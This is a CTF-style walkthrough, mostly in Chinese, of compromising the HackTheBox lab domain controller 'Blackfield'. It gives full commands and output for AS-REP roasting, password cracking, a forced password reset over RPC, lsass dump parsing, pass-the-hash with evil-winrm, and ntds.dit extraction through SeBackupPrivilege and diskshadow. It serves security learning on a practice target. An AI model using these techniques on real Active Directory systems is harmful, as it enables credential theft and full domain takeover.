Blackfield on HackTheBox

Before all

Victim’s IP : 10.10.10.192
Victim’s Host : *.blackfield.locacl
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

1
rustscan -a 10.10.10.192 --ulimit 5000 -- -sC -sV -Pn

Result

1
2
3
4
5
6
7
8
9
10
11
12
PORT     STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 14:03:18Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

又是一台常規的 AD DC,有開 smb, ldap, rpc, kerberos,也能獲得域名:blackfield.local

Exploit

smb info leak

SMB 可以無帳密登入
Command

1
smbclient -L //10.10.10.192/ -N 

Result

1
2
3
4
5
6
7
8
9
10
11
12
13
        Sharename       Type      Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

一一嘗試,於profiles$發現大量使用者名稱,一一進行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
smbclient //10.10.10.192/profiles$ -N          
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
AKoffenburger D 0 Wed Jun 3 12:47:11 2020
......(略)

利用 kerbrute 進行使用者名稱列舉:
Command

1
kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 userlist.txt
1
2
3
4
5
6
7
8
9
10
11
12
13

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/26/24 - Ronnie Flathers @ropnop

2024/12/26 01:21:18 > Using KDC(s):
2024/12/26 01:21:18 > 10.10.10.192:88

2024/12/26 01:21:24 > [+] VALID USERNAME: [email protected]

AS-REP Roasting

利用 impacket-GetNPUsers 嘗試進行 AS-REP Roasting:

1
impacket-GetNPUsers -dc-ip 10.10.10.192 -request -k -usersfile userlist.txt blackfield.local/
1
[email protected]:22deb12d556b6b2883f8053667d775c9$57473ab335b4fc89f83ed373107f6136800b0d2d5f77ebe4bf2b27b4bd27016a8b89f02d69a17b4d2c4b7da6237f87e9662d107ceb273f0fdb0edcaf139019168638db5e6685e118036fe0d6e51e58d521e9aa85b63c2220d88e0a1298f704c9c5cfe45162695ed036c09cd72f2a2517ea105a72c1e99da72c07ecfc8a3a53dfd4f987c6ded59471b8767df9eb0ab37043358fbf5364ca177987dc3bc1c1a1eed6603f200f250ffd1e57b2b86fcfbda19e6e1328422e43d127c54f50913037a555bdee01cb8110c3f3ec9b12bac5b9fd24a6610ed360b8e80ea1d0054472598fa7c2e2537b9c396c5735df552f55ab39bd143424

將獲得的 TGT 透過 john 進行爆破:

1
john hash --wordlist=/home/kali/rockyou.txt

獲得密碼:#00^BlackKnight

ForceChangePassword

先以 bloodhound 進行域資訊蒐集:

1
bloodhound-python -c All -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 --zip

注意到 support 可以幫 audit2020 換密碼
image
先用 rpcclient 進行連接

1
rpcclient -U support //10.10.10.192

接下來在 rpc 幫他換密碼:

1
rpcclient $> setuserinfo2 AUDIT2020 23 Whale120

lsass to PSRemote

注意到 forensic 資料夾有 \memory_analysis\lsass.zip,因為 lsass 是處理驗證的服務,蠻有可能有一些資料,把他 get 下來後 unzip,file知道是 Mini Dump 資料
以 pypykatz dump 出來

1
pypykatz lsa minidump lsass.DMP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==

注意到獲得了 svc_backup 的 NT Hash,以 evil-winrm 進行 Pass The Hash 攻擊嘗試登入並成功

1
evil-winrm -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -i blackfield.local

Privilege Escalation

登入後用 whoami /priv 指令做權限檢查

1
2
3
4
5
6
7
8
9
10
11
PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

有 SeBackupPrivilege,可以利用它把 NTDS 及主機的 SYSTEM 都複製並下載到本地做 NTLM HASH 提取
利用特製的.dsh file搭配diskshadow進行槽複製:

exp.dsh:

1
2
3
4
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:

接著在Evil-Winrm做以下操作:

1
2
3
4
5
mkdir /Temp
cd /Temp
diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system

到這邊基本上已經把檔案都複製到C:\Temp
最後用Evil-Winrm的download指令把他們抓到本地就好ㄌowob

本地轉譯成NTLM HASH:
利用Impacket庫的secretsdump

1
impacket-secretsdump -ntds ntds.dit -system system LOCAL | grep Administrator

最後把拿到的NT HASH打Pass The Hash Attack即可:

evil-winrm -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' -i blackfield.local